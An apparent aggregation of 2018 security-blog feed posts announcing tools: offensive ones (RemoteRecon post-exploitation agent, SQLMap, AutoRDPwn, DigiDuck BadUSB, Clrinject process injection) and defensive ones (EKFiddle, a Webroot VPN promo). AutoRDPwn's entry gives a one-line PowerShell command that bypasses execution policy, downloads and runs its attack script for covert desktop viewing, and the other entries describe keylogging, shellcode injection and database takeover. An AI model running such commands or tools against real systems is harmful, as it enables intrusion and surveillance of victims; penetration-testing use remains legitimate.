Webroot WiFi Security: Expanding Our Commitment to Security & Privacy

Reading Time: ~3 min.For the past 20 years, Webroot’s technology has been driven by our dedication to protecting users from malware, viruses, and other online threats. The release of Webroot® WiFi Security—a new virtual private network (VPN) app for phones, computers, and tablets—is the next step in fulfilling our commitment to protect everyone’s right to be secure in […]
The post Webroot WiFi Security: Expanding Our Commitment to Security & Privacy appeared first on Webroot Blog.

Link: https://www.webroot.com/blog/2018/10/17/webroot-wifi-security-expanding-our-commitment-to-security-privacy/

RemoteRecon – Remote Recon And Collection

RemoteRecon provides the ability to execute post-exploitation capabilities against a remote host, without having to expose your complete toolkit/agent. Often times as operator’s we need to compromise a host, just so we can keylog or screenshot (or some other miniscule task) against a person/host of interest. Why should you have to push over beacon, empire, innuendo, meterpreter, or a custom RAT to the target? This increases the footprint that you have in the target environment, exposes functionality in your agent, and most likely your C2 infrastructure. An alternative would be to deploy a secondary agent to targets of interest and collect intelligence. Then store this data for retrieval at your discretion. If these compromised endpoints are discovered by IR teams, you lose those endpoints and the information you’ve collected, but nothing more. Below is a visual representation of how an adversary would utilize this.RemoteRecon utilizes the registry for data storage, with WMI as an internal C2 channel. All commands are executed in a asynchronous, push and pull manner. Meaning that you will send commands via the powershell controller and then retrieve the results of that command via the registry. All results will be displayed in the local console.Current CapabilitiesPowerShellScreenshotToken ImpersonationInject ReflectiveDll (Must Export the ReflectiveLoader function from Stephen Fewer)Inject ShellcodeKeylogImprovements, Additions, ToDo’s:Dynamically Load and execute .NET assembliesSupport non reflective dll’s for injectionBuild DependeciesThe RemoteRecon.ps1 script already contains a fully weaponized JS payload for the Agent. The payload will only be updated as the code base changes.If you wish to make changes to the codebase on your own, there are a few depencies required.Visual Studio 2015+Windows 7 and .NET SDKWindows 8.1 SDKmscorlib.tlh (This is included in the project but there are instances where intellisense can’t seem to find it [shrug]).NET 3.5 & 4James Forshaw’s DotNetToJScript projectFody/Costura Nuget package. Package and embed any extra dependencies in .NET.For a short setup guide, please visit the wikiDownload RemoteRecon

Link: http://feedproxy.google.com/~r/PentestTools/~3/yXXX3vBqgJk/remoterecon-remote-recon-and-collection.html

SQLMap v1.2.10 – Automatic SQL Injection And Database Takeover Tool

SQLMap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.FeaturesFull support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB and Informix database management systems.Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band.Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.Support to dump database tables entirely, a range of entries or specific columns as per user’s choice. The user can also choose to dump only a range of characters from each column’s entry.Support to search for specific database names, specific tables across all databases or specific columns across all databases’ tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns’ names contain string like name and pass.Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user’s choice.Support for database process’ user privilege escalation via Metasploit’s Meterpreter getsystem command.InstallationYou can download the latest tarball by clicking here or latest zipball by clicking here.Preferably, you can download sqlmap by cloning the Git repository:git clone –depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-devsqlmap works out of the box with Python version 2.6.x and 2.7.x on any platform.UsageTo get a list of basic options and switches use:python sqlmap.py -hTo get a list of all options and switches use:python sqlmap.py -hhYou can find a sample run here. To get an overview of sqlmap capabilities, list of supported features and description of all options and switches, along with examples, you are advised to consult the user’s manual.DemoLinksHomepage: http://sqlmap.orgDownload: .tar.gz or .zipCommits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atomIssue tracker: https://github.com/sqlmapproject/sqlmap/issuesUser’s manual: https://github.com/sqlmapproject/sqlmap/wikiFrequently Asked Questions (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQTwitter: @sqlmapDemos: http://www.youtube.com/user/inquisb/videosScreenshots: https://github.com/sqlmapproject/sqlmap/wiki/ScreenshotsTranslationsBulgarianChineseCroatianFrenchGreekIndonesianItalianJapanesePortugueseSpanishTurkishDownload SQLMap v1.2.10

Link: http://www.kitploit.com/2018/10/sqlmap-v1210-automatic-sql-injection.html

AutoRDPwn – The Shadow Attack Framework

AutoRDPwn is a script created in Powershell and designed to automate the Shadow attack on Microsoft Windows computers. This vulnerability allows a remote attacker to view his victim’s desktop without his consent, and even control it on request. For its correct operation, it is necessary to comply with the requirements described in the user guide.RequirementsPowershell 5.0 or higherChangesVersion 4.0• Fixed a bug in the scheduled task to remove the user AutoRDPwn• The Scheluded Task attack has been replaced by Invoke-Command• It is now possible to choose the language of the application and launch the attack on English versions of Windows*The rest of the changes can be consulted in the CHANGELOG fileUseExecution in a line:powershell -ExecutionPolicy Bypass “cd $ env: TEMP; iwr https://goo.gl/HSkAXP -Outfile AutoRDPwn.ps1;. \ AutoRDPwn.ps1"The detailed guide of use can be found at the following link:https://darkbyte.net/autordpwn-la-guia-definitivaCredits and Acknowledgments• Mark Russinovich for his tool PsExec -> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec• Stas’M Corp. for its RDP tool Wrapper -> https://github.com/stascorp/rdpwrap• Kevin Robertson for his tool Invoke-TheHash -> https://github.com/Kevin-Robertson/Invoke-TheHash• Benjamin Delpy for his tool Mimikatz -> https://github.com/gentilkiwi/mimikatzContactThis software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.For more information, you can contact through info@darkbyte.netDownload AutoRDPwn

Link: http://feedproxy.google.com/~r/PentestTools/~3/FJO5eg5Xcpk/autordpwn-shadow-attack-framework.html

DigiDuck Framework – Framework For Digiduck Development Boards Running ATTiny85 Processors And Micronucleus Bootloader

Framework for Digiduck Development Boards running ATTiny85 processors and micronucleus bootloader!Roadmap:Plan to implement a command for Duckyspark translation within the framework.Requirements:- ATTiny85 or other compatible “Digispark" Development Board(s)- DigiSpark Drivers (If you can use it with arduino you should be fine.)- OSX or MacOS- ArduinoIDE with Digispark Library InstalledGetting Started:Installation:DigiDuck Framework (Referred to as DDF) is really simple to start and setup! There are no third party modules required for DDF! All you need to do is make sure you have Python 3.6+ (I used this to develop it but it should be backwards compatible *hopefully*). Clone this repository and enter the directory from the command line. Once inside the directory simply run:python start.pyThis will start the program and display the Welcome Screen shown above.Help Menu::There are three commands in this Framework! I wanted to make this as lightweight as possible so it only requires one command in order to get a payload onto your board.Command: helpThe help command displays this menu:Command: showThe show command displays this menu:All your available payloads will be shown here. However if you run the execute command they display again.Execution:The third and last command in DDF is execute. The execute command will display the same menu as the show command, however from this menu you will input the payload name. You have to include .hex at the end of it or it won’t load correctly and ask you to enter it again.execute command display.Once you choose your payload you will be prompted to insert your desired board into the computer. From there it will install the desired payload and display this when completed:Thats it! You can now go plug in your badUSB DigiSpark board into a computer and run the desired payload!Payloads:Payloads are DigiSpark .ino hex files that are installed using the micronucleus bootloader to your ATTiny85 or other boards.Current Payloads:All the current payloads are from Hak5’s RubberDucky scripts available here. If you are unsure of what a payload may do this is the place to go read about it. I’ll try to keep the payloads close to the same name but I don’t want you on Windows to be typing out too much since rlcompleter doesn’t work.Creating a Payload:Head to the (Duckyspark GitHub Page)[https://github.com/toxydose/Duckyspark] to see how to create your translated .ino file from a RubberDucky script. After that load your .ino file into Arduino IDE. Make sure Verbose is on inside Preferences and compile your code. Open the terminal output below and look for the .hex file location. It should be in a temp directory in your AppData or equivalent on MacOS. Here’s and example: This is right above where it tells you to plug in your board!Pull the payloadname.cpp.hex file from that folder and drag it into payloads inside the DDF framework. Run the program and your payload will be loaded into Available Payloads!Feel free to contribute by adding custom or more payloads from the Rubber Ducky scripts above! Make a PR with the new payloads.Credits:Duckyspark – https://github.com/toxydose/Duckyspark Micronucleus – https://github.com/micronucleus/micronucleus Hak5 RubberDucky Payloads – https://github.com/hak5darren/USB-Rubber-Ducky/wiki/PayloadsDownload DigiDuck-Framework

Link: http://feedproxy.google.com/~r/PentestTools/~3/W2pYkIn97a4/digiduck-framework-framework-for.html

EKFiddle v.0.8.2 – A Framework Based On The Fiddler Web Debugger To Study Exploit Kits, Malvertising And Malicious Traffic In General

A framework based on the Fiddler web debugger to study Exploit Kits, malvertising and malicious traffic in general.InstallationDownload and install the latest version of Fiddlerhttps://www.telerik.com/fiddlerSpecial instructions for Linux and Mac here:https://www.telerik.com/blogs/fiddler-for-linux-beta-is-herehttps://www.telerik.com/blogs/introducing-fiddler-for-os-x-beta-1Enable C# scripting (Windows only)Launch Fiddler, and go to Tools -> OptionsIn the Scripting tab, change the default (JScript.NET) to C#.Change default text editor (optional)In the same Tools -> Options menu, click on the Tools tab.Windows: notepad.exe or notepad++.exeLinux: geditMac: /Applications/TextEdit.app or /Applications/TextWrangler.appClose FiddlerDownload or clone CustomRules.cs into the appropriate folder based on your operating system:Windows (7/10) C:\Users\[username]\Documents\Fiddler2\Scripts\ Ubuntu /home/[username]/Fiddler2/Scripts/ Mac /Users/[username]/Fiddler2/Scripts/ Finish up the installationStart Fiddler to complete the installation of EKFiddle. That’s it, you’re all set!FeaturesToolbar buttonsThe added toolbar buttons give you quick shortcuts to some of the main features:QuickSaveDumps current web sessions into a SAZ named (QuickSave-“MM-dd-yyyy-HH-mm-ss".saz) to EKFiddle\Captures.UI modeToggle between the default column view or extra columns with additional information (includes time stamp, server IP and type, method, etc.).VPNVPN GUI directly built into Fiddler. It uses the OpenVPN client on Windows and Linux with ovpn files (sigining up with commercial VPN provider may be required). It will open up a new terminal/xterm whenever it connects to a new server via the selected .ovpn config file, killing the previous to ensure only one TAP adapter is used at any given time.WindowsDownload and install OpenVPN in default directoryPlace your .ovpn files inside OpenVPN’s config folder.Linux (tested on Ubuntu 16.04)sudo apt-get install openvpnPlace your .ovpn files in /etc/openvpn.ProxyAllows you to connect to an upstream proxy (HTTP/s or SOCKS).Import SAZ/PCAPA shortcut to load SAZ (Fiddler’s native format) or PCAP (i.e. from Wireshark) captures.View/Edit RegexesView and create your custom regular expressions. Note: a master list is provided with auto-updates via GitHub. Additionally the custom list lets you create your own rules.There are 4 types of indicators to match on:URI (full or partial URI match)IP (Single IP address or IP range)SourceCode (Response Body)Headers (any value within a Response’s Headers)Syntax:Important! Fields are TAB delimitedURI My_URI_rule [a-z0-9]{2} Match URIIP My_IP_address_rule 5\.154\.191\.67 Match static IP addressIP My_IP_address_rule 5\.154\.191\.(6[0-9]|70) Match an IP rangeSourceCode My_sourcecode_rule vml=1 Look for specific stringHeaders My_headers_rule nginx Look for specific stringRun RegexesRun the master and custom regular expressions against current web sessions.Clear MarkingsClear any comment and colour highlighting in the currently loaded sessions.ContextAction menuThe ContextAction menu (accessed by right-clicking on any session(s) allows you to perform additional commands on selected sections. This can be very helpful to do quick lookups, compute hashes or extract IOCs.Hostname or IP address (Google Search, RiskIQ, URLQuery, RiskIQ)Query the hostname for the currently selected session.URIBuild RegexCreate a regular expression from the currently selected URI. This action opens up a regex website and the URI is already in the clipboard, ready to be pasted into the query field.Open in… Internet Explorer, Chrome, Firefox, EdgeThis opens up the URI with the browser you selected.Response BodyRemove encodingDecodes the currently selected sessions (from their basic encoding).Build RegexCreate a regular expression from the currently selected session’s source code. This action opens up a regex website and the URI is already in the clipboard, ready to be pasted into the query field.Calculate MD5/SHA256 hashGet the current session’s body and computes its hash.Hybrid Analysis / VirusTotal lookupChecks the current session’s body for hash, then look up that hash.Extract to DiskDownloads the currently selection session(s)’s body to disk, into the ‘Artifacts’ folder.Extract IOCsCopies into memory basic information from selected sessions so that they can be shared as IOCs. Extract Coinhive site keysConnect-the-dotsAllows you to identify the sequence of events between sessions. Right-clik on the session you are interested in retracing your steps to and simply ‘connect the dots’. It will label the sequence of events from 01, to n within the comments column. You can reorder that column to have a condensed view of the sequence.Crawler (experimental)Load a list of URLs from a text file and let the browser automically visit them. Tools -> Crawler (experimental) -> Start crawler May require some tweaks in your browser’s settings, in particular with regards to crash recovery.Uninstalling EKFiddleDelete CustomRules.csDownload EKFiddle

Link: http://feedproxy.google.com/~r/PentestTools/~3/gKB5SbwjRek/ekfiddle-v082-framework-based-on.html

Clrinject – Injects C# EXE Or DLL Assembly Into Every CLR Runtime And AppDomain Of Another Process

Injects C# EXE or DLL Assembly into any CLR runtime and AppDomain of another process. The injected assembly can then access static instances of the injectee process’s classes and therefore affect it’s internal state.Usageclrinject-cli.exe -p -a <assemblyFile>Opens process with id <processId> or name <processName>, inject <assemblyFile> EXE and execute Main method.Additional options-e Enumerates all loaded CLR Runtimes and created AppDomains.-d <#> Inject only into <#>-th AppDomain. If no number or zero is specified, assembly is injected into every AppDomain.-i <namespace>.<className> Create an instance of class <className> from namespace <namespace>.ExamplesUsage examplesclrinject-cli.exe -p victim.exe -e(Enumerate Runtimes and AppDomains from victim.exe)clrinject-cli.exe -p 1234 -a “C:\Path\To\invader.exe" -d 2(Inject invader.exe into second AppDomain from process with id 1234)clrinject-cli.exe -p victim.exe -a "C:\Path\To\invader.dll" -i "Invader.Invader"(Create instance of Invader inside every AppDomain in victim.exe)clrinject-cli64.exe -p victim64.exe -a "C:\Path\To\invader64.exe"(Inject x64 assembly into x64 process)Injectable assembly exampleFollowing code can be compiled as C# executable and then injected into a PowerShell process. This code accessees static instances of internal PowerShell classes to change console text color to green.using System;using System.Reflection;using Microsoft.PowerShell;using System.Management.Automation.Host;namespace Invader{ class Invader { static void Main(string[] args) { try { var powerShellAssembly = typeof(ConsoleShell).Assembly; var consoleHostType = powerShellAssembly.GetType("Microsoft.PowerShell.ConsoleHost"); var consoleHost = consoleHostType.GetProperty("SingletonInstance", BindingFlags.Static | BindingFlags.NonPublic).GetValue(null); var ui = (PSHostUserInterface)consoleHostType.GetProperty("UI").GetValue(consoleHost); ui.RawUI.ForegroundColor = ConsoleColor.Green; } catch (Exception e) { Console.WriteLine(e.ToString()); } } }}Injection command:clrinject-cli64.exe -p powershell.exe -a "C:\Path\To\invader64.exe"Result:Download Clrinject

Link: http://feedproxy.google.com/~r/PentestTools/~3/pK8N-dwlNI8/clrinject-injects-c-exe-or-dll-assembly.html